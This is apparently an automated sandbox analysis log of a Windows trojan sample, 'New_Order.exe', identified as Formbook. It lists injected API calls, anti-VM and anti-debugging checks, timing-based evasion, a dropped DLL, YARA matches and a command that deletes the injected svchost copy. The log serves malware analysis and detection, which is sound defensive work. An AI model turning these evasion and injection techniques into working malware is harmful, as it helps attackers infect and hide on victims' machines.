Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048AAD30 NtSetContextThread, 7_2_048AAD30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9950 NtQueueApcThread, 7_2_048A9950
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9560 NtWriteFile, 7_2_048A9560
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9A80 NtOpenDirectoryObject, 7_2_048A9A80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9A00 NtProtectVirtualMemory, 7_2_048A9A00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9610 NtEnumerateValueKey, 7_2_048A9610
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9A10 NtQuerySection, 7_2_048A9A10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9A20 NtResumeThread, 7_2_048A9A20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9670 NtQueryInformationProcess, 7_2_048A9670
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A97A0 NtUnmapViewOfSection, 7_2_048A97A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048AA3B0 NtGetContextThread, 7_2_048AA3B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9B00 NtSetValueKey, 7_2_048A9B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048AA710 NtOpenProcessToken, 7_2_048AA710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9730 NtQueryVirtualMemory, 7_2_048A9730
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9760 NtOpenProcess, 7_2_048A9760
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9770 NtSetInformationFile, 7_2_048A9770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048AA770 NtOpenThread, 7_2_048AA770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006281C0 NtCreateFile, 7_2_006281C0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00628270 NtReadFile, 7_2_00628270
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006282F0 NtClose, 7_2_006282F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006283A0 NtAllocateVirtualMemory, 7_2_006283A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006281BA NtCreateFile, 7_2_006281BA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006282EA NtClose, 7_2_006282EA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062839B NtAllocateVirtualMemory, 7_2_0062839B
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Detected potential crypto function
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_00406945 0_2_00406945
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040711C 0_2_0040711C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041BA5D 1_2_0041BA5D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041C34C 1_2_0041C34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00408C60 1_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B4A3 1_2_0041B4A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395EBB0 1_2_0395EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E03DA 1_2_039E03DA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EDBD2 1_2_039EDBD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F2B28 1_2_039F2B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AB40 1_2_0394AB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F22AE 1_2_039F22AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFA2B 1_2_039DFA2B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392F900 1_2_0392F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B090 1_2_0393B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F20A8 1_2_039F20A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F28EC 1_2_039F28EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1002 1_2_039E1002
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FE824 1_2_039FE824
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FDFCE 1_2_039FDFCE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F1FF1 1_2_039F1FF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F2EF7 1_2_039F2EF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039ED616 1_2_039ED616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03946E30 1_2_03946E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F25DD 1_2_039F25DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393D5E0 1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F2D07 1_2_039F2D07
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03920D20 1_2_03920D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F1D55 1_2_039F1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393841F 1_2_0393841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039ED466 1_2_039ED466
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487B090 7_2_0487B090
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048920A0 7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_049320A8 7_2_049320A8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04921002 7_2_04921002
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487841F 7_2_0487841F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04892581 7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487D5E0 7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486F900 7_2_0486F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04932D07 7_2_04932D07
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04860D20 7_2_04860D20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04884120 7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04931D55 7_2_04931D55
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_049322AE 7_2_049322AE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04932EF7 7_2_04932EF7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04886E30 7_2_04886E30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489EBB0 7_2_0489EBB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04931FF1 7_2_04931FF1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04932B28 7_2_04932B28
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062BA5D 7_2_0062BA5D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062C34C 7_2_0062C34C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00618C60 7_2_00618C60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B4A3 7_2_0062B4A3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00612D90 7_2_00612D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00612FB0 7_2_00612FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B150 appears 48 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0486B150 appears 35 times
PE file contains strange resources
Source: New_Order.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs New_Order.exe
Uses 32bit PE files
Source: New_Order.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@13/8
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040460D
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar, 0_2_0040216B
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmp
Source: New_Order.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\New_Order.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\New_Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: New_Order.exe Virustotal: Detection: 38%
Source: New_Order.exe ReversingLabs: Detection: 59%
Source: C:\Users\user\Desktop\New_Order.exe File read: C:\Users\user\Desktop\New_Order.exe
Source: unknown Process created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New_Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: New_Order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410109 push eax; iretd 1_2_0041010B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041A2F2 push es; ret 1_2_0041A337
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00415BFC push ss; ret 1_2_00415BFD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B46C push eax; ret 1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B402 push eax; ret 1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B40B push eax; ret 1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004154D4 push ss; iretd 1_2_004154DC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413E26 pushfd ; iretd 1_2_00413E27
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414EC1 push es; retf 1_2_00414EC2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397D0D1 push ecx; ret 1_2_0397D0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048BD0D1 push ecx; ret 7_2_048BD0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00620109 push eax; iretd 7_2_0062010B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062A2F2 push es; ret 7_2_0062A337
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00625BFC push ss; ret 7_2_00625BFD
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B3B5 push eax; ret 7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B46C push eax; ret 7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B402 push eax; ret 7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B40B push eax; ret 7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006254D4 push ss; iretd 7_2_006254DC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00623E26 pushfd ; iretd 7_2_00623E27
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00624EC1 push es; retf 7_2_00624EC2

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll
Source: C:\Users\user\Desktop\New_Order.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\New_Order.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004088B0 rdtsc 1_2_004088B0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5048 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 6240 Thread sleep time: -44000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004088B0 rdtsc 1_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409B20 LdrLoadDll, 1_2_00409B20
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h] 0_2_10001000
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h] 0_2_024D1790
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h] 0_2_024D19A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952397 mov eax, dword ptr fs:[00000030h] 1_2_03952397
